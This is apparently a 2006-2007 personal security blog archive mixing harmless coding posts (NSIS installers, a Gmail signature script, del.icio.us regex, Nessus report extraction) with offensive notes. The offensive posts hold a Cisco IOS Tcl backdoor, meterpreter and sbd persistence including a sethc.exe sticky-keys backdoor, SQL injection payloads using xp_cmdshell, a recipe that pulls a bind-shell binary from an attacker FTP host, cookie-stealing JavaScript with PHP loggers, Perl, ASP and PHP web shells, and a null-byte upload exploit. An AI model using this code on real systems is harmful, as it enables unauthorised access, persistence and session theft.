Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!

20071128

Shell code for IOS using TCLSH on Cisco devices..

An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper here.
Oops: didnt known what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.

20071119

Low hangin fruit

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

20071116

RSS / ATOM - Security Tagging Framework for Yahoo PIPES



I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.

Ive also created an example on how to use the framework with existing YAHOO-PIPES.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance

20070711

QRcode - semanatic posting...

Email: r@qry.jp

QRcode decoding through the web... enjoy the robot.

20070620

SQL injection information and tools

Wow.. there's been a blow up recently on SQL injection tools and root kits. This has been a great boom over the older semi-dead projects.

Ive found the perl blind SQL bf tools to be most helpful in scanning.
http://www.514.es/download/bsqlbfv1.2-th.pl

Here was a quick shot of other multiple sql tools
http://www.unsec.net/2006/11/herramientas_sql_injection.html

The OWASP one always needs some help SQLiX ..
http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project

Current updated list of SQL injection tools
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners

Argeniss - Great indepth data and such
Hacking Databases for owning your data (Full root kits for oracle and tsql)
http://www.argeniss.com/research.html

20070510

Building NSIS Installers for Large File Distributions

I've been working on some solutions recently to distribute large data sets utilizing numerous compressed files groups. I decided the best way to dummy proof this was to wrap an installer around them and do it "right". So here is how to do that with an installer.

If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application and a couple others containing the app, and maybe a required piece of library software like winpcap) you need a robust solution such as the Nullsoft Install System - NSIS.

The most logical idea is to create a single file, but NSIS does have file size limitations within it's compiler. Currently it is about 2GB in size. So deploying a package of say 8GB (something that might normally fit on a Dual Layer DVD) is not possible with standard NSIS single file installers. This solution uses external plugins to decompress the files within the same directory framework as the installer. This allows you to create large file distributions that could be delivered on large media or across gigabit speed networks.

Tools Req:

7zip [installer] - Compression Utility
Notepad++ [installer] - IDE
NSIS [installer]
UltraModernUI NSIS User Interface [installer] - personal choice of GUI for NSIS installer
Untgz Contrib plugin [installer] - Decompression library

Files to Distrubute:
compressed_1.tar
-- decomp_set1of5_file1of2.txt
-- decomp_set1of5_file2of2.txt
compressed_2.tar
-- decomp_set2of5_file1of3.txt
-- decomp_set2of5_file2of3.txt
-- decomp_set2of5_file3of3.txt
compressed_3.tar
-- decomp_set3of5_file1of2.txt
-- decomp_set3of5_file2of2.txt
compressed_4.tar
-- decomp_set4of5_file1of1.txt
compressed_5.tar
-- decomp_set5of5_file1of3.txt
-- decomp_set5of5_file2of3.txt
-- decomp_set5of5_file3of3.txt

1
2
3 !include LogicLib.nsh
4
5 Function .onInit
6
# Section Size must be manually set to the size of the required disk space NSIS will not do this for external files.
7
# set required size of section number of kilobytes
8
# 8gb to kilo bytes = 8,388,608
9
SectionSetSize ${SecDecompress} 8388608
10
11
;compressed_#.taz has be in the same directory as the Setup file.
12
${If} ${FileExists} "$EXEDIR\compressed_1.tar"
13
${AndIf} ${FileExists} "$EXEDIR\compressed_2.tar"
14
${AndIf} ${FileExists} "$EXEDIR\compressed_3.tar"
15
${AndIf} ${FileExists} "$EXEDIR\compressed_4.tar"
16
${AndIf} ${FileExists} "$EXEDIR\compressed_5.tar"
17
Return
18
${Else}
19
MessageBox MB_OK|MB_ICONINFORMATION "This copy of the installer is missing a compressed#.tar file.." IDOK abort
20
abort:
21
Banner::destroy
22
Abort
23
${EndIf}
24
25 FunctionEnd
26
27 Section -decompress SecDecompress
28
29
;UnTGZ Plugin
30
;compressed_#.tar in this example is not compressed by gzip just tar collection
31
; untgz plugin requires -znone to denote this
32
33 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_1.tar"
34
${If}${FileExists} "$INSTDIR\decomp_set1of5_file1of2.txt"
35
${AndIf} ${FileExists} "$INSTDIR\decomp_set1of5_file2of2.txt"
36 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_2.tar"
37
${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file1of3.txt"
38
${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file2of3.txt"
39
${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file3of3.txt"
40 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_3.tar"
41
${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file1of2.txt"
42
${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file2of2.txt"
43 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_4.tar"
44
${AndIf} ${FileExists} "$INSTDIR\decomp_set4of5_file1of1.txt"
45 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_5.tar"
46
${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file1of3.txt"
47
${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file2of3.txt"
48
${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file3of3.txt"
49
Goto EverythingOk
50
${Else}
51 MessageBox MB_OK|MB_ICONEXCLAMATION "Installation Failure. Media may be corrupt." IDOK
abort
52
abort:
53
Banner::destroy
54 Abort
55
${EndIf}
56
EverythingOK:
57
58
;If tar files were packaged into the setup you can delete it like this :)
59
;Delete "$INSTDIR\compressed#.taz"
60
61 SectionEnd

20070403

Session redirect in php and asp

These are examples of correct ways to handle access and redirects in sessions in asp(1.0|vbs) & php.. I dont know how may times I see this done wrong..

ASP example

<%
If NOT Session("Authenticated") = 1 Then
Response.Redirect ("login.asp")
'Response.Redirect ("login.asp", true); '<= This is the same as the default
'Exit ' <= This is called with default True statemens as above
End If
%>



PHP Example
<?PHP
if ($_SESSION['access'] != "yes")
{ header(Location:login.php); /* Redirect browser */
exit; /* Make sure that code below does not get executed when we redirect. */
}
//Code Following Should not be executed unless authenticated.
echo ("secure code");
?>


Note: Since PHP 4.4.2 and PHP 5.1.2 this function prevents more than one header
to be sent at once as a protection against header injection attacks.

20070330

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

20070328

Setting and Confirming reg keys w/meterpreter.

super quick meterpreter sequence
Prep
upload c:\\sbdbg.exe c:\\windows\\system32\\


Set
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"


Verify
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor


Use
(reboot)

20070323

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.

20070315

Pentest Order of Objects..

ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has lead to a really good idea for object orient coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)

GAINING ACCESS AND PRIVILEGE ESCALATION

-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

20070313

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).



Netcat and its NC Clones:

  • netcat - "swiss army knife"
  • sbd & sbdbg.exe - shadowinteger's backdoor
  • netcat6 - swiss army knife+ for ipv6
  • cryptcat - netcat with twofish encryption
  • socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
    socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80

Simpler tools:
None of this is news.. I just wanted to point out some of this simple stuff.

20070308

sbd fun as a rookit via sethc.exe

SBD Fun

Transfering files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10


Transfering files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337


PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000


Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc


Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}


Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

20070307

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>


I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify sql Server through Blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


MS-SQL

Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

20070306

reverse-shell from SQL server

So you go the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to SQL:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:
net user add

On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe

{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp

{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..
time

{SQL template} schedule execution of bat file
at \\sql.vuln.box\ 04:20 evil.bat

connect from any.evil.ip
sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images

PNG Headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width

Comment writers for jpegs
edjpgcom

Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>


Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write lol from echo with hex (no newline) to file
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

although plink -raw and telnet are not as good they can work.

Play with Cookies

Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie View
Javascript:alert(document.cookie);


Manipulate Cookie
Javascript:void(document.cookie=“variable=value”);


stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


Other stealers
<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4

global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('".$Redirect."')</script>";
?>


Perl shell
#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}


ASP Quicky whoami ?
<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>


ASP Shell
- WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>


Curl into older PHP servers from chroot skeletons.

<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>


Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA

20070215

Gmail HTML Signatures - GreaseMonkey script

So of course you cant create html signatures in gmail... ergg!

Silly rabbit, you can drag and drop images/html into the gmail Richtext editor...
well that just will not do.

So that would mean - greasemonkey script! Im not going to waste any time here.
GMAIL HTML SIGNATURE - Install this Script
//
// Released under the CC Attribution 2.5 license
// http://creativecommons.org/licenses/by/2.5/
// --------------------------------------------------------------------
//
// This is a Greasemonkey user script.
//
// To setup, insert html signature code into:
// * html_signature
// --------------------------------------------------------------------
//
// ==UserScript==
// @name GMAIL HTML Signature
// @namespace http://shad0wbq.answorld.com/
// @description Insert HTML signature into GMAIL
// @include http://gmail.google.com/*
// @include https://gmail.google.com/*
// @include http://mail.google.com/*
// @include https://mail.google.com/*
// ==/UserScript==
//
var html_signature = '<div style="margin: 0 auto 0 auto; margin-top: 5px; margin-bottom: 5px;" >' +
'<a href="http://feeds.feedburner.com/Codeburst">' +
'<img src="http://feeds.feedburner.com/Codeburst.gif" style="border:0" alt="codeBurst"/>' +
'</a></div>';

window.setTimeout(function() {
//Debug Frame window
// alert(window.frames[0].name);
if (window.frames[0])
{
if (window.frames[0].name == "v2_hc_compose")
{
var logo = window.frames[0].document.createElement("div");
logo.innerHTML = '<br><br>' + html_signature
window.frames[0].document.body.insertBefore(logo,window.frames[0].document.body.lastChild);
}
}
}, 600);

20070212

del.icio.us Regex

I was working on bring in my collection of bookmarks for use on del.icio.us. There is still some work to be done on del.icio.us web interface, and most of the API apps that I used just didnt fit the bill so some quick regex helped with importation and exportation.

Main use for this was to enable sharing on all imported bookmarks.

So we need some regex for implementations on the api.

del.icio.us can read and export Netscape bookmark files.

<meta equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
</p><dt><a href="http://www.testtest.com/" last_visit="117002438" add_date="117002438" tags="wee,w00t">test test</a>
</dt></dl>

These can very easily be modified via regex to work as api calls
Example API calls
https://api.del.icio.us/v1/posts/add?&url=http://www.testtest.com/&description=test test&tags=wee%20w00t&replace=yes&shared=yes
https://api.del.icio.us/v1/posts/delete?&url=http://www.testtest.com/


Regex Convertion for del.icio.us
(<dt><a href="http://www2.blogger.com/%29%28.*%29%28" tags=")(.*)(">)(.*)(</a></dt>)
https://api.del.icio.us/v1/posts/add?&url=\2&description=\6&tags=\4&replace=yes&shared=yes

20070207

Dirty Listing of Nessus Dangerous Plugins

Tenable Nessus .. needed dangerous plugins descriptions

cd \progra~1\tenable\nessus\plugins\scripts\
egrep -l egrep -l "(ACT_DESTRUCT|ACT_DENIAL)" *.nasl>c:\temp\dangerous_list.txt


Quick vbs file..
Copy files from list in files to temp.

Dim objFileSystem, objInputFile, fso, aFile, afilename
Dim strInputFile, inputData, strData, strListFile, i

Const OPEN_FILE_FOR_READING = 1

' generate a filename base on the script name, here readfile.in
strListFile = "c:\temp\dangerous_list.txt"

Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objInputFile = objFileSystem.OpenTextFile(strListFile, OPEN_FILE_FOR_READING)

' read everything in an array
afilename = "c:\progra~1\tenable\nessus\plugins\scripts\"

Do While Not objInputFile.AtEndOfStream
Dim Line
Line = objInputFile.readline
' Do something with "Line"
Set fso = CreateObject("Scripting.FileSystemObject")
Set aFile = fso.GetFile(afilename & trim(Line))
aFile.Copy("c:\temp\scripts\" & trim(Line))
Set aFile = Nothing
Set fso = Nothing
Loop

objInputFile.Close
Set objFileSystem = Nothing

WSCRIPT.QUIT(0)

Grab nessus extract tool via wget
Dump info to file .. done.

wget http://cvsweb.nessus.org/cgi-bin/viewcvs.cgi/
*checkout*/nessus-tools/nessus-extract/
nessus-extract.pl?rev=1.4.2.10&content-type=text/plain

perl nessus_extract.pl -p "c:\temp\scripts" >c:\temp\Dangerous_Plugins.txt

20070122

Apache redirect direct linked images...

don’t direct link images .. bad things happen
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?yoururl\.com/.*$ [NC]
RewriteRule \.(gif|jpg|jpeg|bmp)$ redirected_image.jpg [L]
- credit fif3

20070111

Detecting VMMs - virtual machine monitors

Red Pill...

int swallow_redpill () {
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
return (m[5]>0xd0) ? 1 : 0;
}


redpill.c

redpill.exe
TrapKit.de info..

VMware fingerprint codes
scoopy doo - A VMware Fingerprint Suite

jerry - A(nother) VMware Fingerprinter

20070104

Northern Virginia Security Groups

NoVA Sec

Pure technical gatherings for security professionals in the northern Virginia area. Check your certifications at the door

http://novasec.blogspot.com/

OWASP NoVA
OWASP chapter meetings are free and open to anyone interested in application security.
http://www.owasp.org/

20070103

MOAB / MOKB / VIZSEC '06

Well to catch up a little on the vuln world.. There's a couple things I'm watching.

Month of Apple Bugs

Info-Pull's MoAB

PoC/Exploit are included with every release.. how nice.

Month Of Kernel Bugs

Info-Pull's the MoKB

Numerous Kernel bugs listed for FreeBSD 6.1, Linux 2.6, as well as OS X.


Retirement of Elsenot.com
Else not has officially closed its doors for updates..
"ElseNot part one is done. ElseNot part two may or may not start." ~ Layne


Conference VIZSEC '06

The preceding for the conference held on November 3rd 2006 have been posted. There are alot really interesting white papers.. here are a couple of interest..

2D Visualizations
"VAST: Visualizing Autonomous System Topology"

- Jon Oberheide, Manish Karir and Dionysus Blazakis [whitepaper] [presentation]

"FlowTag: A Collaborative Attack-Analysis, Reporting, and Sharing Tool for Security Researchers"

- Christopher P. Lee and John A. Copeland [whitepaper] [presentation]

"Understanding Multistage Attacks by Attack-Track based Visualization of Heterogeneous Event Streams"

- Sunu Mathew, Richard Giomundo, Shambhu J. Upadhyaya, Moises Sudit, Adam Stotz [whitepaper] [presentation]

"Visual Toolkit for Network Security Experiment Specification and Data Analysis"

- Lunquan Li, Peng Liu, George Kesidis [whitepaper] [presentation]

"An Intelligent, Interactive Tool for Exploration and Visualization of Time-Oriented Security Data"

- Asaf Shabtai, Denis Klimov, Yuval Shahar, and Yuval Elovici[whitepaper] [presentation]

"Visualizing DNS Traffic"

- Pin Ren, John Kristoff and Bruce Gooch [whitepaper] [presentation]


3D Visualizations
"Interactively Combining 2D and 3D Visualization for Network Traffic Monitoring"

- Erwan Le Malecot, Masayoshi Kohara, Yoshiaki Hori, and Kouichi Sakurai [whitepaper] [presentation]

"Real-Time Collaborative Network Monitoring and Control Using 3D Game Engines for Representation and Interaction"

- Warren Harrop and Grenville Armitage [whitepaper] [presentation]